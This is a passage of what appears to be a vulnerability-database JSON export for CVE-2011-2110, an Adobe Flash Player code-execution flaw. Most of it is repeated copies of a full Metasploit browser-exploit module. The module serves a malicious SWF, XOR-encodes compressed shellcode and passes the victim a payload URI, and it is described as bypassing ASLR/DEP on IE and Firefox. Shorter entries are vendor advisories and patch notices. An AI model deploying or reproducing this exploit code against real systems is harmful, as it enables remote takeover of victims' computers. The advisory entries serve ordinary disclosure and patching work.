licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23\r\n\t\t\t\tand earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification\r\n\t\t\t\tlogic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same\r\n\t\t\t\tvulnerability that was used for attacks against Korean based organizations.\r\n\r\n\t\t\t\t\tSpecifically, this issue occurs when indexing an array using an arbitrary value,\r\n\t\t\t\tmemory can be referenced and later executed. Taking advantage of this issue does not rely\r\n\t\t\t\ton heap spraying as the vulnerability can also be used for information leakage.\r\n\r\n\t\t\t\t\tCurrently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several\r\n\t\t\t\tother browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and\r\n\t\t\t\tis very reliable.\r\n\t\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit,\r\n\t\t\t\t\t'Unknown' # malware version seen used in targeted attacks\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-2110'],\r\n\t\t\t\t\t['OSVDB', '48268'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/devnet/swf.html'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/bulletins/apsb11-18.html'],\r\n\t\t\t\t\t['URL', 'http://www.accessroot.com/arteam/site/download.php?view.331'],\r\n\t\t\t\t\t['URL', 'http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'HTTP::compression' => 'gzip',\r\n\t\t\t\t\t'HTTP::chunked' => true,\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => "\\x00",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {}],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 21 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# src for the flash file: external/source/exploits/CVE-2011-2110/CVE-2011-2110.as\r\n\t\t# full aslr/dep bypass using the info leak as per malware\r\n\t\tpath = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-2110.swf" )\r\n\t\tfd = File.open( path, "rb" )\r\n\t\t@swf = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tif agent =~ /MSIE/\r\n\t\t\treturn targets[0] # ie 6/7/8 tested working\r\n\t\telsif agent =~ /Firefox/\r\n\t\t\treturn targets[0] # ff 10.2 tested working\r\n\t\telse\r\n\t\t\treturn nil\r\n\t\tend\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tmy_target = get_target(agent)\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\txor_byte = 122\r\n\t\ttrigger = @swf\r\n\t\ttrigger_file = rand_text_alpha(rand(6)+3) + ".swf"\r\n\t\tcode = rand_text_alpha(rand(6)+3) + ".txt"\r\n\r\n\t\tsc = Zlib::Deflate.deflate(payload.encoded)\r\n\t\tshellcode = ""\r\n\r\n\t\tsc.each_byte do | c |\r\n\t\t\tshellcode << (xor_byte ^ c)\r\n\t\tend\r\n\r\n\t\turi = ((datastore['SSL']) ? "https://" : "http://")\r\n\t\turi << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])\r\n\t\turi << ":#{datastore['SRVPORT']}#{get_resource()}/#{code}"\r\n\r\n\t\tbd_uri = Zlib::Deflate.deflate(uri)\r\n\r\n\t\turi = ""\r\n\t\tbd_uri.each_byte do | c |\r\n\t\t\turi << (xor_byte ^ c)\r\n\t\tend\r\n\r\n\t\tbd_uri = uri.unpack("H*")[0]\r\n\r\n\t\tobj_id = rand_text_alpha(rand(6)+3)\r\n\r\n\t\tif request.uri.match(/\\.swf/i)\r\n\t\t\tprint_status("Sending malicious swf")\r\n\t\t\tsend_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif request.uri.match(/\\.txt/i)\r\n\t\t\tprint_status("Sending payload")\r\n\t\t\tsend_response(cli, shellcode, { 'Content-Type' => 'text/plain' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = <<-EOS\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t</head>\r\n\t\t<body>\r\n\t\t<center>\r\n\t\t<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"\r\n\t\tid="#{obj_id}" width="600" height="400"\r\n\t\tcodebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">\r\n\t\t<param name="movie" value="#{get_resource}/#{trigger_file}?info=#{bd_uri}" />\r\n\t\t<embed src="#{get_resource}/#{trigger_file}?info=#{bd_uri}" quality="high"\r\n\t\twidth="320" height="300" name="#{obj_id}" align="middle"\r\n\t\tallowNetworking="all"\r\n\t\ttype="application/x-shockwave-flash"\r\n\t\tpluginspage="http://www.macromedia.com/go/getflashplayer">\r\n\t\t</embed>\r\n\t\t</object>\r\n\t\t</center>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tEOS\r\n\r\n\t\thtml = html.gsub(/^\\t\\t/, '')\r\n\r\n\t\tprint_status("Sending #{self.name} HTML")\r\n\t\tsend_response(cli, html, { 'Content-Type' => 'text/html' })\r\n\tend\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-73235", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:02:37", "description": "BUGTRAQ ID: 48268\r\nCVE ID: CVE-2011-2110\r\n\r\nFlash Player\u662f\u4e00\u6b3e\u9ad8\u6027\u80fd\u7684\u3001\u8f7b\u91cf\u578b\u4e14\u6781\u5177\u8868\u73b0\u529b\u7684\u5ba2\u6237\u7aef\u8fd0\u884c\u65f6\u64ad\u653e\u5668\u3002\r\n\r\nAdobe Flash Player\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u5185\u5b58\u7834\u574f\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u4ee3\u7801\u6216\u53ef\u80fd\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\n\nAdobe Flash Player < 10.3.181.26\r\nGoogle Chrome < 12.0.742.100\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\nAdobe\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08APSB11-18\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nAPSB11-18\uff1aSecurity update available for Adobe Flash Player\r\n\r\n\u94fe\u63a5\uff1ahttp://www.adobe.com/support/security/bulletins/apsb11-18.html", "cvss3": {}, "published": "2011-06-17T00:00:00", "title": "Adobe Flash Player\u8fdc\u7a0b\u5185\u5b58\u7834\u574f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2011-06-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20643", "id": "SSV:20643", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2021-10-19T20:39:28", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB11-18, listed in\nthe References section. Specially-crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code.\n(CVE-2011-2110)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.3.181.26.\n", "cvss3": {}, "published": "2011-06-15T00:00:00", "type": "redhat", "title": "(RHSA-2011:0869) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2110"], "modified": "2018-06-07T05:04:26", "id": "RHSA-2011:0869", "href": "https://access.redhat.com/errata/RHSA-2011:0869", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-03-18T03:05:38", "description": "This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same vulnerability that was used for attacks against Korean based organizations. Specifically, this issue occurs when indexing an array using an arbitrary value, memory can be referenced and later executed. Taking advantage of this issue does not rely on heap spraying as the vulnerability can also be used for information leakage. Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and is very reliable.\n", "cvss3": {}, "published": "2012-06-20T02:52:37", "type": "metasploit", "title": "Adobe Flash Player AVM Verification Logic Array Indexing Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASHPLAYER_ARRAYINDEXING/", "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/adobe_flashplayer_arrayindexing/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution',\n 'Description' => %q{\n This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23\n and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification\n logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same\n vulnerability that was used for attacks against Korean based organizations.\n\n Specifically, this issue occurs when indexing an array using an arbitrary value,\n memory can be referenced and later executed. Taking advantage of this issue does not rely\n on heap spraying as the vulnerability can also be used for information leakage.\n\n Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several\n other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and\n is very reliable.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit\n 'Unknown' # malware version seen used in targeted attacks\n ],\n 'References' =>\n [\n ['CVE', '2011-2110'],\n ['OSVDB', '73007'],\n ['BID', '48268'],\n ['URL', 'http://www.adobe.com/devnet/swf.html'],\n ['URL', 'http://www.adobe.com/support/security/bulletins/apsb11-18.html'],\n ['URL', 'http://www.accessroot.com/arteam/site/download.php?view.331'],\n ['URL', 'http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'HTTP::compression' => 'gzip',\n 'HTTP::chunked' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 2000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {}],\n ],\n 'DisclosureDate' => '2012-06-21',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n # src for the flash file: external/source/exploits/CVE-2011-2110/CVE-2011-2110.as\n # full aslr/dep bypass using the info leak as per malware\n path = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2011-2110.swf\" )\n fd = File.open( path, \"rb\" )\n @swf = fd.read(fd.stat.size)\n fd.close\n super\n end\n\n def check_dependencies\n use_zlib\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n if agent =~ /MSIE/\n return targets[0] # ie 6/7/8 tested working\n elsif agent =~ /Firefox/\n return targets[0] # ff 10.2 tested working\n else\n return nil\n end\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n my_target = get_target(agent)\n\n # Avoid the attack if the victim doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}\")\n send_not_found(cli)\n return\n end\n\n xor_byte = 122\n trigger = @swf\n trigger_file = rand_text_alpha(rand(6)+3) + \".swf\"\n code = rand_text_alpha(rand(6)+3) + \".txt\"\n\n sc = Zlib::Deflate.deflate(payload.encoded)\n shellcode = \"\"\n\n sc.each_byte do | c |\n shellcode << (xor_byte ^ c)\n end\n\n uri = ((datastore['SSL']) ? \"https://\" : \"http://\")\n uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])\n uri << \":#{datastore['SRVPORT']}#{get_resource()}/#{code}\"\n\n bd_uri = Zlib::Deflate.deflate(uri)\n\n uri = \"\"\n bd_uri.each_byte do | c |\n uri << (xor_byte ^ c)\n end\n\n bd_uri = uri.unpack(\"H*\")[0]\n\n obj_id = rand_text_alpha(rand(6)+3)\n\n if request.uri.match(/\\.swf/i)\n print_status(\"Sending malicious swf\")\n send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })\n return\n end\n\n if request.uri.match(/\\.txt/i)\n print_status(\"Sending payload\")\n send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })\n return\n end\n\n html = <<-EOS\n <html>\n <head>\n </head>\n <body>\n <center>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\"\n id=\"#{obj_id}\" width=\"600\" height=\"400\"\n codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\n <param name=\"movie\" value=\"#{get_resource}/#{trigger_file}?info=#{bd_uri}\" />\n <embed src=\"#{get_resource}/#{trigger_file}?info=#{bd_uri}\" quality=\"high\"\n width=\"320\" height=\"300\" name=\"#{obj_id}\" align=\"middle\"\n allowNetworking=\"all\"\n type=\"application/x-shockwave-flash\"\n pluginspage=\"http://www.macromedia.com/go/getflashplayer\">\n </embed>\n </object>\n </center>\n </body>\n </html>\n EOS\n\n html = html.gsub(/^ {4}/, '')\n\n print_status(\"Sending #{self.name} HTML\")\n send_response(cli, html, { 'Content-Type' => 'text/html' })\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-13T00:29:12", "description": "This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same vulnerability that was used for attacks against Korean based organizations. Specifically, this issue occurs when indexing an array using an arbitrary value, memory can be referenced and later executed. Taking advantage of this issue does not rely on heap spraying as the vulnerability can also be used for information leakage. Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and is very reliable.\n", "edition": 2, "cvss3": {}, "published": "2012-06-20T02:52:37", "type": "metasploit", "title": "Adobe Flash Player AVM Verification Logic Array Indexing Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2110"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASHPLAYER_ARRAYINDEXING", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution',\n 'Description' => %q{\n This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23\n and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification\n logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same\n vulnerability that was used for attacks against Korean based organizations.\n\n Specifically, this issue occurs when indexing an array using an arbitrary value,\n memory can be referenced and later executed. Taking advantage of this issue does not rely\n on heap spraying as the vulnerability can also be used for information leakage.\n\n Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several\n other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and\n is very reliable.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit\n 'Unknown' # malware version seen used in targeted attacks\n ],\n 'References' =>\n [\n ['CVE', '2011-2110'],\n ['OSVDB', '73007'],\n ['BID', '48268'],\n ['URL', 'http://www.adobe.com/devnet/swf.html'],\n ['URL', 'http://www.adobe.com/support/security/bulletins/apsb11-18.html'],\n ['URL', 'http://www.accessroot.com/arteam/site/download.php?view.331'],\n ['URL', 'http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'HTTP::compression' => 'gzip',\n 'HTTP::chunked' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 2000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {}],\n ],\n 'DisclosureDate' => '2012-06-21',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n # src for the flash file: external/source/exploits/CVE-2011-2110/CVE-2011-2110.as\n # full aslr/dep bypass using the info leak as per malware\n path = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2011-2110.swf\" )\n fd = File.open( path, \"rb\" )\n @swf = fd.read(fd.stat.size)\n fd.close\n super\n end\n\n def check_dependencies\n use_zlib\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n if agent =~ /MSIE/\n return targets[0] # ie 6/7/8 tested working\n elsif agent =~ /Firefox/\n return targets[0] # ff 10.2 tested working\n else\n return nil\n end\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n my_target = get_target(agent)\n\n # Avoid the attack if the victim doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}\")\n send_not_found(cli)\n return\n end\n\n xor_byte = 122\n trigger = @swf\n trigger_file = rand_text_alpha(rand(6)+3) + \".swf\"\n code = rand_text_alpha(rand(6)+3) + \".txt\"\n\n sc = Zlib::Deflate.deflate(payload.encoded)\n shellcode = \"\"\n\n sc.each_byte do | c |\n shellcode << (xor_byte ^ c)\n end\n\n uri = ((datastore['SSL']) ? \"https://\" : \"http://\")\n uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])\n uri << \":#{datastore['SRVPORT']}#{get_resource()}/#{code}\"\n\n bd_uri = Zlib::Deflate.deflate(uri)\n\n uri = \"\"\n bd_uri.each_byte do | c |\n uri << (xor_byte ^ c)\n end\n\n bd_uri = uri.unpack(\"H*\")[0]\n\n obj_id = rand_text_alpha(rand(6)+3)\n\n if request.uri.match(/\\.swf/i)\n print_status(\"Sending malicious swf\")\n send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })\n return\n end\n\n if request.uri.match(/\\.txt/i)\n print_status(\"Sending payload\")\n send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })\n return\n end\n\n html = <<-EOS\n <html>\n <head>\n </head>\n <body>\n <center>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\"\n id=\"#{obj_id}\" width=\"600\" height=\"400\"\n codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\n <param name=\"movie\" value=\"#{get_resource}/#{trigger_file}?info=#{bd_uri}\" />\n <embed src=\"#{get_resource}/#{trigger_file}?info=#{bd_uri}\" quality=\"high\"\n width=\"320\" height=\"300\" name=\"#{obj_id}\" align=\"middle\"\n allowNetworking=\"all\"\n type=\"application/x-shockwave-flash\"\n pluginspage=\"http://www.macromedia.com/go/getflashplayer\">\n </embed>\n </object>\n </center>\n </body>\n </html>\n EOS\n\n html = html.gsub(/^ {4}/, '')\n\n print_status(\"Sending #{self.name} HTML\")\n send_response(cli, html, { 'Content-Type' => 'text/html' })\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2021-06-08T18:56:57", "description": "No description provided", "edition": 2, "cvss3": {}, "published": "2011-06-17T00:00:00", "title": "Adobe Flash Player memory corruption", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2011-06-17T00:00:00", "id": "SECURITYVULNS:VULN:11742", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11742", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2022-01-19T16:03:50", "description": "\n\nAdobe Product Security Incident Response Team reports:\n\nA critical vulnerability has been identified in Adobe Flash\n\t Player 10.3.181.23 and earlier versions for Windows, Macintosh,\n\t Linux and Solaris, and Adobe Flash Player 10.3.185.23 and\n\t earlier versions for Android. This memory corruption\n\t vulnerability (CVE-2011-2110) could cause a crash and\n\t potentially allow an attacker to take control of the affected\n\t system. There are reports that this vulnerability is being\n\t exploited in the wild in targeted attacks via malicious Web\n\t pages.\n\n\n", "cvss3": {}, "published": "2011-05-13T00:00:00", "type": "freebsd", "title": "linux-flashplugin -- remote code execution vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2110"], "modified": "2011-05-13T00:00:00", "id": "55A528E8-9787-11E0-B24A-001B2134EF46", "href": "https://vuxml.freebsd.org/freebsd/55a528e8-9787-11e0-b24a-001b2134ef46.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:35", "description": "", "cvss3": {}, "published": "2012-06-20T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player AVM Verification Logic Array Indexing Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2012-06-20T00:00:00", "id": "PACKETSTORM:113921", "href": "https://packetstormsecurity.com/files/113921/Adobe-Flash-Player-AVM-Verification-Logic-Array-Indexing-Code-Execution.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23 \nand earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification \nlogic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same \nvulnerability that was used for attacks against Korean based organizations. \n \nSpecifically, this issue occurs when indexing an array using an arbitrary value, \nmemory can be referenced and later executed. Taking advantage of this issue does not rely \non heap spraying as the vulnerability can also be used for information leakage. \n \nCurrently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several \nother browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and \nis very reliable. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit, \n'Unknown' # malware version seen used in targeted attacks \n], \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2011-2110'], \n['OSVDB', '48268'], \n['URL', 'http://www.adobe.com/devnet/swf.html'], \n['URL', 'http://www.adobe.com/support/security/bulletins/apsb11-18.html'], \n['URL', 'http://www.accessroot.com/arteam/site/download.php?view.331'], \n['URL', 'http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'HTTP::compression' => 'gzip', \n'HTTP::chunked' => true, \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 2000, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {}], \n], \n'DisclosureDate' => 'Jun 21 2012', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n# src for the flash file: external/source/exploits/CVE-2011-2110/CVE-2011-2110.as \n# full aslr/dep bypass using the info leak as per malware \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2011-2110.swf\" ) \nfd = File.open( path, \"rb\" ) \n@swf = fd.read(fd.stat.size) \nfd.close \nsuper \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nif agent =~ /MSIE/ \nreturn targets[0] # ie 6/7/8 tested working \nelsif agent =~ /Firefox/ \nreturn targets[0] # ff 10.2 tested working \nelse \nreturn nil \nend \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nmy_target = get_target(agent) \n \n# Avoid the attack if the victim doesn't have the same setup we're targeting \nif my_target.nil? \nprint_error(\"#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}\") \nsend_not_found(cli) \nreturn \nend \n \nxor_byte = 122 \ntrigger = @swf \ntrigger_file = rand_text_alpha(rand(6)+3) + \".swf\" \ncode = rand_text_alpha(rand(6)+3) + \".txt\" \n \nsc = Zlib::Deflate.deflate(payload.encoded) \nshellcode = \"\" \n \nsc.each_byte do | c | \nshellcode << (xor_byte ^ c) \nend \n \nuri = ((datastore['SSL']) ? \"https://\" : \"http://\") \nuri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']) \nuri << \":#{datastore['SRVPORT']}#{get_resource()}/#{code}\" \n \nbd_uri = 